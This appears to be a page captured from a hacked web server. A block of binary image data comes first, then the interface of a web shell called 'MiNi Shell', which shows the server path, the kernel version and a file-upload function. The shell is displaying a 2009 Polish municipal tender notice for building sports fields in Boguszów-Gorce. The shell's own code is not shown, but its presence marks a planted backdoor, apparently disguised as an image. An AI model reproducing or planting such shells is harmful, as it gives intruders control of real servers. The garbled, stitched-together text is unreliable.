JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090414/61999-N-2009.html

<p class="kh_header"><b>Boguszów-Gorce: Budowa kompleksu boisk sportowych w ramach programu Moje Boisko - Orlik 2012 na terenie stadionu przy ul. Bema w Boguszowie - Gorcach</b><br>
<b>Numer ogłoszenia: 61999 - 2009; data zamieszczenia: 14.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Boguszów-Gorce , Pl. Odrodzenia 1, 58-370 Boguszów-Gorce, woj. dolnośląskie, tel. 074 8449311 w. 32, faks 074 8449165.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.boguszow-gorce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kompleksu boisk sportowych w ramach programu Moje Boisko - Orlik 2012 na terenie stadionu przy ul. Bema w Boguszowie - Gorcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje budowę kompleksu boisk sportowych wraz z zapleczem szatniowo-sanitarnym, w ramach programu Moje Boisko - Orlik 2012 na terenie stadionu przy ul. Bema w Boguszowie-Gorcach (działka nr 190-4, obręb 7 Kuźnice Świdnickie). Kompleks boisk obejmuje: a) boisko do piłki nożnej o wymiarach 30,0m x 62,0m o pow. całkowitej 1860m2 (pole gry 26,0 x 56,0) o nawierzchni ze sztucznej trawy wykonanej w wariancie 1 tj. wysokość włókna min. 60 mm na podbudowie z kruszywa, z bramkami, ogrodzeniem oraz piłkochwytami b) boisko wielofunkcyjne o wymiarach 19,1m x 32,0 m o pow. całkowitej 613,11m2 (pole do gry 15,1 x 28,1) o nawierzchni poliuretanowej wykonanej w wariancie II tj, w technologii typu natrysk, z wyposażeniem do gier zespołowych określonych w dokumentacji projektowej c) zespół szatniowo - sanitarny według dokumentacji projektowej d) urządzenia towarzyszące - ogrodzenie terenu, oświetlenie terenu, chodniki, fundamenty pod budynek zaplecza socjalnego e) roboty towarzyszące odrębne dla każdego boiska zostały wyszczególnione w dokumentacjach projektowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.20-4, 45.21.22.21-1, 45.23.24.51-8, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca musi dostarczyć Zamawiającemu przed upływem terminu składania ofert, wadium o wartości  10.000,00 PLN (słownie: dziesięć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WARUNKI UDZIAŁU W POSTĘPOWANIU

1. WYKONAWCA UBIEGAJĄCY SIĘ O UDZIELENIE ZAMÓWIENIA MUSI SPEŁNIAĆ NASTĘPUJĄCE WARUNKI:

1.Posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3.Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.Nie podlegać wykluczeniu ustawowemu z postępowania o udzielenie zamówienia publicznego podstawie art. 24 ust.1 i 2 ustawy pzp.

2.KONSORCJA WYKONAWCÓW:
2.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.

2.2Wykonawcy ubiegający się wspólnie o udzielenie zamówienia powinni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 

2.3Warunki niniejszego postępowania dotyczące Wykonawcy, stosuje się odpowiednio do wykonawców, o których mowa w pk-cie 2.2, tzn. że oferta powinna zawierać wszystkie informacje, oświadczenia i dokumenty wymienione w części II ust. 3 Instrukcji, dotyczące każdego z partnerów wspólnego przedsięwzięcia.

2.4Wykonawcy występujący wspólnie, którym zostanie udzielone zamówienie zobowiązani będą przed podpisaniem umowy z Zamawiającym zawrzeć umowę współpracy zawierająca w szczególności: 
a)wskazanie podmiotów, które zawarły umowę i określenie sposobu reprezentacji oraz prowadzenia spraw wspólnych,
b)określenie celu zawarcia umowy ze wskazaniem zakresu obowiązków poszczególnych podmiotów.
c)wykonawcy wspólnie ubiegający się o zamówienie, ponoszą solidarnie odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego zabezpieczenia umowy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> DOKUMENTY I OŚWIADCZENIA JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY, W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do
rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku przedsiębiorców występujących  wspólnie -  m.in.  Spółki  cywilne, konsorcja  - zaświadczenie o   wpisie   do   ewidencji  działalności  gospodarczej lub odpis z właściwego  rejestru każdego  ze  wspólników) 
b)Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,że wykonawca  ( w przypadku przedsiębiorców występujących wspólnie zaświadczenie każdego ze wspólników)   nie zalega  z  opłacaniem  podatków  lub zaświadczenie,  że wykonawca  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie na  raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c)Aktualne zaświadczenie z właściwego  oddziału Zakładu  Ubezpieczeń  Społecznych  lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca (w przypadku przedsiębiorców występujących wspólnie zaświadczenie każdego ze wspólników) nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
d)Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w Art. 24 ust. 1 punkt 4-8 ustawy pzp.  (w przypadku przedsiębiorców występujących wspólnie informacja każdego ze wspólników) - wystawiona nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert. 
e)Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w Art. 24ust.1 pkt. 9 ustawy pzp, - wystawiona nie wcześniej niż 6 miesięcy przed upływemterminu składania ofert. 
f)Polisa lub inny dokument ubezpieczenia, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - ważna na dzień składania ofert.
g)Informacja banku, w której potwierdza się wielkość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, tj. posiadanie przez Wykonawcę środków własnych lub zdolności kredytowej w wysokości minimum 1 000.000,00 PLN. - wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
h)Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiących przedmiot zamówienia tj.: wykonanie robót budowlanych polegających na wykonaniu przynajmniej jednego boiska do piłki nożnej o nawierzchni z trawy syntetycznej, o wartość min. 300.000,00 PLN (brutto), oraz przynajmniej jednego boiska wielofunkcyjnego o nawierzchni poliuretanowej o wartości min. 300.000,00 PLN (brutto), z podaniem ich wartości oraz daty i miejsca wykonania,  wraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (wzór - załącznik nr 3),
i)Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonaniu zamówienia, z udokumentowaniem posiadanych uprawnień oraz przynależności do Okręgowej Izby Inżynierów Budownictwa. Zamawiający wymaga wykazanie kierownika robót budowlanych z uprawnieniami w zakresie branży ogólnobudowlanej lub drogowej oraz kierowników robót z uprawnieniami w zakresie branż: instalacje sanitarnej i instalacje elektryczne (kserokopie potwierdzone za zgodność z oryginałem), (wzór - załącznik nr 4),
j)wykaz oświadczeń i dokumentów potwierdzających spełnianie warunków jakościowych, które należy dołączyć do oferty: 
1. Dokumenty dotyczące nawierzchni poliuretanowej:
Certyfikat lub deklaracja zgodności z norma PN-EN 14877:2008, lub aprobata     
  techniczna ITB, lub rekomendacja techniczna ITB,  lub wyniki badań specjalistycznego  
  laboratorium potwierdzającego parametry oferowanej nawierzchni np. Labosport, lub  
  dokument równoważny.
  Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
  Atest PZH dla oferowanej nawierzchni.
  Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy  
  na realizowana inwestycję wraz z potwierdzeniem gwarancji udzielonej przez  
  producenta na tą inwestycje.

	  2. Dokumenty dotyczące nawierzchni z trawy syntetycznej:
  Raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport     
  lub Sports Labs Ltd),
  dotyczący oferowanej nawierzchni , potwierdzający zgodność jej parametrów z  
  Handbook of Rest Methods for Football Turf (dostępny na FIFA.com)
  Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub aprobata   
  echniczna ITB, lub rekomendacja techniczna ITB, lub wyniki badań specjalistycznego  
  laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport. ISA-     
  Sport, Sports Labs Ltd lub dokument równoważny.
  Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
  Atest PZH dla oferowanej nawierzchni.
  Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na   
  realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta 
  na tą nawierzchnię. 


	Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składają dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich dokumenty mogą być składane (Dz. U. z 2006r. Nr 87, poz. 605)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.boguszow-gorce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Boguszowie - Gorcach , Pl. Odrodzenia 1 , pok. nr 207.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2009 godzina 09:00, miejsce: Urząd Miejski w Boguszowie - Gorcach 
Pl. Odrodzenia pok. nr 001.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com